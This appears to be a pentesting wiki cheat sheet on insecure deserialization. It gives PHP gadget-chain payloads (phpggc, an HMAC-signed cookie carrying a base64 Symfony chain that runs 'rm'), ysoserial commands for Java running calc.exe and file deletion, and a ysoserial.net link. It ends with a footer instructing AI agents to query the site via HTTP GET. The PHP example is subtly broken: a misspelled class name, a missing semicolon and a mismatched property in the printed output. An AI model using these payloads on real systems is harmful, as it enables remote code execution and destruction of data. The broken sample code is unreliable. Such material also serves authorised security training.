# Insecure Deserialization

## PHP

### Manual serialization

Manual serialization with class internal members override (access to an app source code) in order to achieve specific functionality.

```php
<?php
// app class definition deletes a template file in the class destructor()
// initiate the object through cookie "session" 

class CustomTemplate {
    // make sure the access attribute is "public"
    public $template_file_path;
}    

$c = new CustomTeplate();
$c->template_file_path="/path/file-to-delete.txt"

// final serialized PHP object
echo serialize($c);

/* output
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>
```

### PHPGCC

automatic gadget chain when no source code review is possible

```
git clone https://github.com/ambionics/phpggc.git
```

```
phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0
```

### SHA1-HMAC - PHP signed gadget chain

```php
<?php

$phpgcc_object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==";
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";

$cookie = urlencode('{"token":"' . $phpgcc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpgcc_object, $secretKey) . '"}');
echo $cookie;
?>
```

{% embed url="<https://github.com/ambionics/phpggc>" %}

## Java

```shell
// there is no jar!
git clone https://github.com/frohoff/ysoserial.git
```

```bash
// jar download
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
```

```
java -jar ysoserial.jar CommonsCollections4 calc.exe
```

```
java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt\'|base64 -w0
```

{% embed url="<https://github.com/frohoff/ysoserial>" %}

## .NET

```
git clone https://github.com/pwntester/ysoserial.net.git
```

{% embed url="<https://github.com/pwntester/ysoserial.net>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackerlab.gitbook.io/wiki.hackerlab.cz/web-pentesting/insecure-deserialization.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.